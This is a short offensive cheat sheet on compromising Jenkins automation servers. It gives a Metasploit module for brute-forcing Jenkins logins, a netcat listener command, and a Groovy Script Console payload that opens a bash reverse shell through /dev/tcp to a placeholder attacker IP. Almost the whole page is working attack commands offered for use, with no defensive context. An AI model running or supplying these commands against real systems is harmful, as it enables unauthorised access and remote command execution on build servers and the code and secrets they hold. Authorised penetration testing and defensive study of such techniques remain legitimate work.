Last modified: 2023-01-01
Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc.
Brute Force Credentials
msfconsole msf > use auxiliary/scanner/http/jenkins_login
Reverse Shell on Dashboard
You need to have the credential.
Opening Listener on Your Local Machine
nc -lvnp 4444
Login to Jenkins
Access "http://localhost:8080" in browser and login.
Click "Manage Jenkins" -> "Script Console"
Add the Payload in the Console
r = Runtime.getRuntime() p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/<Attacker_IP>/4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String) p.waitFor()
Then you should get a shell.